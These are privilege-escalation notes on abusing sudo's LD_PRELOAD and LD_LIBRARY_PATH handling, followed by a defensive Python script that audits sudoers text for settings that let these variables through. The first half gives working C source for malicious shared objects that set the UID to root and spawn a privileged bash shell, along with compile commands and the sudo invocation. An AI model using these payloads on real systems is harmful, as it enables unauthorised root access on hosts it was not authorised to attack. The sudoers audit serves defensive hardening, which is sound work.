
Sudo Environment Variables

LD_PRELOAD

If LD_PRELOAD is set, the dynamic linker loads the shared object it names before any other library.

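Malicious shared object
#define _GNU_SOURCE     /* exposes setresuid() in <unistd.h> */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the object is loaded, before the target program's main(). */
void _init() {
    unsetenv("LD_PRELOAD");    /* keep the spawned shell from preloading this object again */
    setresuid(0,0,0);          /* set real, effective and saved UID to root */
    system("/bin/bash -p");    /* -p: bash keeps the effective UID */
}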

Compile with: gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

LD_LIBRARY_PATH

LD_LIBRARY_PATH is an environment variable that lists directories to be searched for shared libraries first, before the default locations.

Show the shared objects used by a program with ldd:
ldd /usr/bin/apache2

Output: shared objects, choose one to replace

Replace a shared object with a malicious one.

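Malicious shared object
#define _GNU_SOURCE     /* exposes setresuid() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* constructor: runs when the library is loaded, before the program's main(). */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");    /* keep the spawned shell from resolving libraries here */
    setresuid(0,0,0);               /* set real, effective and saved UID to root */
    system("/bin/bash -p");         /* -p: bash keeps the effective UID */
}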

Compile with: gcc -o <name of the shared object to replace> -shared -fPIC library_path.c

Run command with malicious shared object
sudo LD_LIBRARY_PATH=<Malicious .so directory> <sudo command>
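
Both techniques only work when sudo lets the variable through. With the default env_reset, a variable given on the sudo command line is dropped unless an env_keep entry lists it or setenv / the SETENV tag applies. The audit below is an added example, not part of the original notes: it scans sudoers text for those settings, and the sample content, users and commands in it are constructed.

```python
import fnmatch
import re

LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")  # the two variables covered above

# Constructed sample sudoers content; users and commands are hypothetical.
SAMPLE = '''\
Defaults env_reset
Defaults env_keep += "LANG LD_PRELOAD"   # weak: preserves a loader variable
Defaults env_keep -= "LD_LIBRARY_PATH"
# Defaults env_keep += "LD_LIBRARY_PATH"
Defaults:deploy !setenv
alice ALL=(root) SETENV: /usr/sbin/apache2
bob ALL=(root) NOSETENV: /usr/bin/find
Defaults env_keep += \\
    "LD_*"
'''

def audit_sudoers(text):
    """Return (line_number, reason) findings for sudoers content given as a string."""
    findings, buf, start = [], "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        start = start or no
        if raw.endswith("\\"):  # a trailing backslash continues the entry
            buf += raw[:-1] + " "
            continue
        line, first, buf, start = buf + raw, start, "", 0
        # Drop comments but keep "#1000"-style uids; include directives are not followed.
        line = re.sub(r"(^|\s)#(?!\d).*", "", line).strip()
        if line.startswith("Defaults"):
            # "=" and "+=" add to the preserved list; "-=" removes and is not flagged.
            for m in re.finditer(r'\benv_keep\s*\+?=\s*("[^"]*"|[^\s,]+)', line):
                for pattern in m.group(1).strip('"').split():
                    kept = [v for v in LOADER_VARS if fnmatch.fnmatchcase(v, pattern)]
                    if kept:
                        findings.append((first, "env_keep preserves " + ", ".join(kept)))
            if re.search(r"(?<![!\w])setenv\b", line):
                findings.append((first, "setenv: command-line variables bypass env_keep"))
        elif re.search(r"\bSETENV\s*:", line):
            findings.append((first, "SETENV tag: command-line variables bypass env_keep"))
    return findings

if __name__ == "__main__":
    for no, reason in audit_sudoers(SAMPLE):
        print(f"line {no}: {reason}")
```

On a real host, pass it the contents of /etc/sudoers and each file under /etc/sudoers.d, since included files are not followed. It does not flag the SETENV that sudoers implies for a command matched by ALL.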